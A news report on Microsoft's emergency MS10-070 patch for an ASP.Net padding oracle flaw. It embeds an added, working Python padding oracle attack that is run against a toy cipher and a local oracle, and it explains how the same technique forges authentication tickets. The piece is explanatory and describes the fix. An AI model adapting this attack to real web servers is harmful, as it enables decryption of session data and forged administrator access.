As promised, Microsoft today delivered an emergency out-of-band patch for an ASP.Net flaw that is being actively exploited by attackers.
The fix addresses a padding oracle vulnerability in ASP.Net's handling of encrypted data: because the server's error responses revealed whether a tampered ciphertext had decrypted to validly padded data, an attacker could decrypt view state, session cookies or other encrypted data exchanged with a remote server; forge forms-authentication tickets to access Web applications with full administrator rights; and retrieve files, such as web.config, from sites or Web applications.
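The flaw MS10-070 closed is a classic CBC padding oracle: an ASP.Net server's error handling told an attacker whether a modified ciphertext decrypted to valid padding, and that single bit per request is enough to recover view state or a forms-authentication cookie without the key. The Python below is an added example, not code from the article, from Microsoft or from the researchers' tool. It assumes a toy Feistel block cipher in place of AES (the attack never looks inside the cipher, only at the oracle), a constructed demo key and ticket, and a local function standing in for the HTTP request/response pair that served as the oracle on a real server.

```python
import hashlib
import hmac
import os

BLOCK = 16

# Toy 16-byte block cipher: a 4-round Feistel network with HMAC-SHA256 as the
# round function. It stands in for AES so the example has no third-party
# dependency; the attack below treats it as a black box.
def _round(key: bytes, r: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[:8]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for r in range(4):
        left, right = right, _xor(left, _round(key, r, right))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for r in reversed(range(4)):
        left, right = _xor(right, _round(key, r, left)), left
    return left + right

def pad(data: bytes) -> bytes:              # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")     # the distinguishable failure
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    prev = os.urandom(BLOCK)                # random IV, sent in the clear
    out, padded = prev, pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    if len(data) % BLOCK or len(data) < 2 * BLOCK:
        raise ValueError("bad length")
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    plain = b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))
    return unpad(plain)

def make_oracle(key: bytes):
    # Server-side behaviour the flaw exposed: the caller learns only whether
    # decryption produced valid padding (on a real server, via the error page).
    def oracle(data: bytes) -> bool:
        try:
            cbc_decrypt(key, data)
            return True
        except ValueError:
            return False
    return oracle

def padding_oracle_attack(oracle, ciphertext: bytes) -> bytes:
    """Recover the plaintext of an IV-prefixed CBC ciphertext with no key,
    using only the oracle's valid/invalid answers (about 128 queries per byte)."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)            # D_k(cur), learned one byte at a time
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos
            crafted = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):  # force already-known bytes to padval
                crafted[j] = inter[j] ^ padval
            for guess in range(256):
                crafted[pos] = guess
                if not oracle(bytes(crafted) + cur):
                    continue
                if pos == BLOCK - 1:
                    # A hit on the last byte could be a longer valid pad (02 02, ...)
                    # that depends on byte 14; flipping it must keep the pad valid.
                    probe = bytearray(crafted)
                    probe[pos - 1] ^= 0xFF
                    if not oracle(bytes(probe) + cur):
                        continue
                inter[pos] = guess ^ padval
                break
            else:
                raise RuntimeError("oracle never accepted a guess")
        recovered += _xor(inter, prev)      # P = D_k(C) XOR C_prev
    return unpad(recovered)

# Constructed sample: a forms-authentication-style ticket and a demo key. Neither
# the key nor the ticket format is ASP.Net's real one.
SAMPLE_TICKET = b"user=guest;role=User;expires=2010-09-28T00:00Z"
DEMO_KEY = b"constructed-demo-key"

def demo(key: bytes = DEMO_KEY, ticket: bytes = SAMPLE_TICKET) -> bytes:
    """Encrypt the ticket as the server would, then recover it as the attacker."""
    ciphertext = cbc_encrypt(key, ticket)
    return padding_oracle_attack(make_oracle(key), ciphertext)
```

Running `demo()` returns the original ticket byte for byte, having asked the oracle a few thousand yes/no questions and never seeing the key. The same oracle lets an attacker encrypt chosen plaintext (work the attack backwards to produce a ciphertext that decrypts to a forged ticket), which is the route to the administrator-rights impact described above. The durable fix is to authenticate every ciphertext with a MAC and reject it before any decryption or padding check runs, so that no request-dependent error remains for an attacker to distinguish; uniform error pages, the interim workaround Microsoft published, only hide the signal rather than remove it.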
ASP.Net is the Microsoft-designed Web application framework used to craft millions of sites and applications.
Microsoft first sounded the alert Sept. 17 after a pair of researchers, Juliano Rizzo and Thai Duong, demonstrated at the ekoparty conference how attackers could use the padding oracle to pilfer browser session cookies, or steal usernames and passwords from Web sites.
Three days later, Microsoft warned users that it was seeing limited, active attacks, and urged Web server administrators to apply the workarounds spelled out in an updated advisory.
Today's MS10-070 update patches ASP.Net in all supported versions of Windows, ranging from Windows XP Service Pack 3 (SP3) and Windows Server 2003 to Windows 7 and Windows Server 2008 R2.
Microsoft pegged the single bug addressed Tuesday as "important," the second-highest ranking in its four-step system. "Based on our comprehensive monitoring of the threat landscape, we have determined an out-of-band release is needed to protect customers, as we have seen limited attacks and continued attempts to bypass current defenses and workarounds," the company said yesterday.